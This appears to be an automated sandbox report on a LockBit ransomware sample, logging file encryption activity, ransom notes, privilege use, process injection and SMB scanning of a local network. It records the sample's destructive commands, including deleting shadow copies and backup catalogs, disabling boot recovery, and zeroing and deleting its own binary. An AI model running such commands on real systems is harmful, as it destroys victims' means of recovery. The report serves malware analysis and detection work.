File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.properties	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Jakarta	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME26.CSS	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_up.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File created	C:\Program Files\Java\jdk1.7.0_80\jre\Restore-My-Files.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.properties	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_ja.jar	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\css\slideShow.css	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00809_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\7-Zip\Lang\is.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.core_3.5.0.v20120725-1805.jar	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\vlc.mo	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105526.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107290.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0237336.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-coredump.xml	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\vlc.mo	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0195260.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198377.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR34F.GIF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Darwin	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14883_.GIF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Traditional.dotx	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImage.jpg	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\localizedStrings.js	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\js\library.js	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_right.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\TAB_ON.GIF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_LOOP_BG_PAL.wmv	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\dt.jar	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File created	C:\Program Files\Windows Photo Viewer\fr-FR\Restore-My-Files.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00297_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_zh_4.4.0.v20140623020002.jar	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state_1.0.1.v20140709-1414.jar	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Zurich	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY00795_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Origin.xml	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\css\cpu.css	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_precomp_matte.wmv	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-windows.jar	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00687_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00403_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0292270.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR31F.GIF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Algiers	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\vlc.mo	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Windows Sidebar\es-ES\sbdrop.dll.mui	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\settings.js	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\background.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_LightSpirit.gif	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Elegant.dotx	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kolkata	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-api.jar	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\core_visualvm.jar	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\ED00172_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN01218_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Windows\SysWOW64\mshta.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Windows\SysWOW64\cmd.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Windows\SysWOW64\PING.EXE	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Windows\SysWOW64\fsutil.exe	N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\SysWOW64\cmd.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\PING.EXE	N/A

Interacts with shadow copies

ransomware

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\system32\vssadmin.exe	N/A

Modifies Control Panel

evasion

Description	Indicator	Process	Target
Set value (str)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Control Panel\Desktop\WallpaperStyle = "2"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
Set value (str)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Control Panel\Desktop\TileWallpaper = "0"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A

Modifies Internet Explorer settings

adware spyware

Description	Indicator	Process	Target
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main	C:\Windows\SysWOW64\mshta.exe	N/A

Runs ping.exe

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\SysWOW64\PING.EXE	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeTakeOwnershipPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeAuditPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: 33	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: 34	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: 35	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: 33	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: 34	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: 35	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\system32\wbengine.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\wbengine.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\system32\wbengine.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 1984 wrote to memory of 1616	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	C:\Windows\System32\cmd.exe
PID 1984 wrote to memory of 1616	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	C:\Windows\System32\cmd.exe
PID 1984 wrote to memory of 1616	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	C:\Windows\System32\cmd.exe
PID 1984 wrote to memory of 1616	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	C:\Windows\System32\cmd.exe
PID 1616 wrote to memory of 2548	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 1616 wrote to memory of 2548	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 1616 wrote to memory of 2548	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 1616 wrote to memory of 3048	N/A	C:\Windows\System32\cmd.exe	C:\Windows\System32\Wbem\WMIC.exe
PID 1616 wrote to memory of 3048	N/A	C:\Windows\System32\cmd.exe	C:\Windows\System32\Wbem\WMIC.exe
PID 1616 wrote to memory of 3048	N/A	C:\Windows\System32\cmd.exe	C:\Windows\System32\Wbem\WMIC.exe
PID 1616 wrote to memory of 1004	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\bcdedit.exe
PID 1616 wrote to memory of 1004	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\bcdedit.exe
PID 1616 wrote to memory of 1004	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\bcdedit.exe
PID 1616 wrote to memory of 2552	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\bcdedit.exe
PID 1616 wrote to memory of 2552	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\bcdedit.exe
PID 1616 wrote to memory of 2552	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\bcdedit.exe
PID 1616 wrote to memory of 2492	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\wbadmin.exe
PID 1616 wrote to memory of 2492	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\wbadmin.exe
PID 1616 wrote to memory of 2492	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\wbadmin.exe
PID 1984 wrote to memory of 2068	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	C:\Windows\SysWOW64\mshta.exe
PID 1984 wrote to memory of 2068	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	C:\Windows\SysWOW64\mshta.exe
PID 1984 wrote to memory of 2068	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	C:\Windows\SysWOW64\mshta.exe
PID 1984 wrote to memory of 2068	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	C:\Windows\SysWOW64\mshta.exe
PID 1984 wrote to memory of 2096	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	C:\Windows\SysWOW64\cmd.exe
PID 1984 wrote to memory of 2096	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	C:\Windows\SysWOW64\cmd.exe
PID 1984 wrote to memory of 2096	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	C:\Windows\SysWOW64\cmd.exe
PID 1984 wrote to memory of 2096	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	C:\Windows\SysWOW64\cmd.exe
PID 2096 wrote to memory of 2412	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\PING.EXE
PID 2096 wrote to memory of 2412	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\PING.EXE
PID 2096 wrote to memory of 2412	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\PING.EXE
PID 2096 wrote to memory of 2412	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\PING.EXE
PID 2096 wrote to memory of 2516	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\fsutil.exe
PID 2096 wrote to memory of 2516	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\fsutil.exe
PID 2096 wrote to memory of 2516	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\fsutil.exe
PID 2096 wrote to memory of 2516	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\fsutil.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

C:\Windows\System32\cmd.exe

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\LockBit-note.hta"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe" & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\SysWOW64\fsutil.exe

fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

Network

Country	Destination	Domain	Proto
N/A	10.127.0.212:445		tcp
N/A	10.127.0.196:445		tcp
N/A	10.127.0.203:445		tcp
N/A	10.127.0.1:445		tcp
N/A	10.127.0.198:445		tcp
N/A	10.127.0.200:445		tcp
N/A	10.127.0.188:445		tcp
N/A	10.127.0.244:445		tcp
N/A	10.127.0.225:445		tcp
N/A	10.127.0.253:445		tcp
N/A	10.127.0.216:445		tcp
N/A	10.127.0.240:445		tcp
N/A	10.127.0.239:445		tcp
N/A	10.127.0.206:445		tcp
N/A	10.127.0.231:445		tcp
N/A	10.127.0.219:445		tcp
N/A	10.127.0.6:445		tcp
N/A	10.127.0.237:445		tcp
N/A	10.127.0.192:445		tcp
N/A	10.127.0.211:445		tcp
N/A	10.127.0.236:445		tcp
N/A	10.127.0.247:445		tcp
N/A	10.127.0.221:445		tcp
N/A	10.127.0.213:445		tcp
N/A	10.127.0.251:445		tcp
N/A	10.127.0.252:445		tcp
N/A	10.127.0.199:445		tcp
N/A	10.127.0.230:445		tcp
N/A	10.127.0.232:445		tcp
N/A	10.127.0.222:445		tcp
N/A	10.127.0.208:445		tcp
N/A	10.127.0.245:445		tcp
N/A	10.127.0.210:445		tcp
N/A	10.127.0.214:445		tcp
N/A	10.127.0.190:445		tcp
N/A	10.127.0.234:445		tcp
N/A	10.127.0.202:445		tcp
N/A	10.127.0.241:445		tcp
N/A	10.127.0.223:445		tcp
N/A	10.127.0.233:445		tcp
N/A	10.127.0.226:445		tcp
N/A	10.127.0.218:445		tcp
N/A	10.127.0.205:445		tcp
N/A	10.127.0.248:445		tcp
N/A	10.127.0.209:445		tcp
N/A	10.127.0.254:445		tcp
N/A	10.127.0.189:445		tcp
N/A	10.127.0.207:445		tcp
N/A	10.127.0.246:445		tcp
N/A	10.127.0.224:445		tcp
N/A	10.127.0.215:445		tcp
N/A	10.127.0.201:445		tcp
N/A	10.127.0.250:445		tcp
N/A	10.127.0.238:445		tcp
N/A	10.127.0.191:445		tcp
N/A	10.127.0.249:445		tcp
N/A	10.127.0.204:445		tcp
N/A	10.127.0.151:445		tcp
N/A	10.127.0.220:445		tcp
N/A	10.127.0.193:445		tcp
N/A	10.127.0.195:445		tcp
N/A	10.127.0.243:445		tcp
N/A	10.127.0.235:445		tcp
N/A	10.127.0.242:445		tcp
N/A	10.127.0.197:445		tcp
N/A	10.127.0.228:445		tcp
N/A	10.127.0.194:445		tcp
N/A	10.127.0.229:445		tcp
N/A	10.127.0.227:445		tcp
N/A	10.127.0.217:445		tcp
N/A	10.127.0.159:445		tcp
N/A	10.127.0.162:445		tcp
N/A	10.127.0.182:445		tcp
N/A	10.127.0.130:445		tcp
N/A	10.127.0.160:445		tcp
N/A	10.127.0.157:445		tcp
N/A	10.127.0.171:445		tcp
N/A	10.127.0.187:445		tcp
